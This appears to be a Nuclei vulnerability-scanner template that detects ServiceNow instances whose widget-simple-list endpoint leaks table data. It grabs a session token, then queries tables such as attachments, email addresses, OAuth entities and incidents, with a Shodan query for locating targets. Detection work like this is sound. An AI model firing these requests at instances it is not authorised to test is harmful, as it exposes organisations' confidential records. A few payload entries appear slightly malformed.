id: servicenow-widget-misconfig info: name: ServiceNow Widget-Simple-List - Misconfiguration author: DhiyaneshDk severity: unknown reference: - https://github.com/bsysop/servicenow - https://twitter.com/ConspiracyProof/status/1713270026046685272 - https://www.enumerated.ie/servicenow-data-exposure metadata: verified: true max-request: 54 shodan-query: title:"servicenow" tags: servicenow,widget,misconfig http: - raw: - | @once GET / HTTP/1.1 Host: {{Hostname}} - | @once GET /login.do HTTP/1.1 Host: {{Hostname}} - | POST /api/now/sp/widget/widget-simple-list?{{table_list}} HTTP/1.1 Host: {{Hostname}} Accept: application/json X-UserToken: {{user-token}} Content-Type: application/json {} cookie-reuse: true payloads: table_list: - t=kb_knowledge&f=text - t=cmdb_model&f=name - t=cmn_department&f=app_name - t=licensable_app&f=app_name - t=alm_asset&f=display_name - t=sys_attachment&f=file_name - t=sys_attachment_doc&f=data - t=oauth_entity&f=name - t=cmn_cost_center&f=name - t=cmdb_model&f=name - t=sc_cat_item&f=name - t=sn_admin_center_application&f-name - t=cmn_company&f=name - t=sys_email_attachment&f=email - t=sys_email_attachment&f=attachment - t=cmn_notif_device&f=email_address - t=sys_portal_age&f=display_name - t=incident&f=short_description matchers-condition: and matchers: - type: word part: body words: - '"isValid":true' - '"count":' condition: and - type: regex part: body regex: - '"display_value":"(.*)",' extractors: - type: regex name: user-token group: 1 regex: - var g_ck = '([0-9a-z]+)' internal: true - type: regex part: body group: 1 regex: - '"count":([0-9]+),' # digest: 4a0a0047304502206b22efe69ad4efc305da1c7eeaab03f6e38fff2485bfbc680b1ae92463b29138022100b7c6035241a5106c9dc5c506f77b289aaddc6088933d29cb14319d80a86796e0:922c64590222798bb761d5b6d8e72950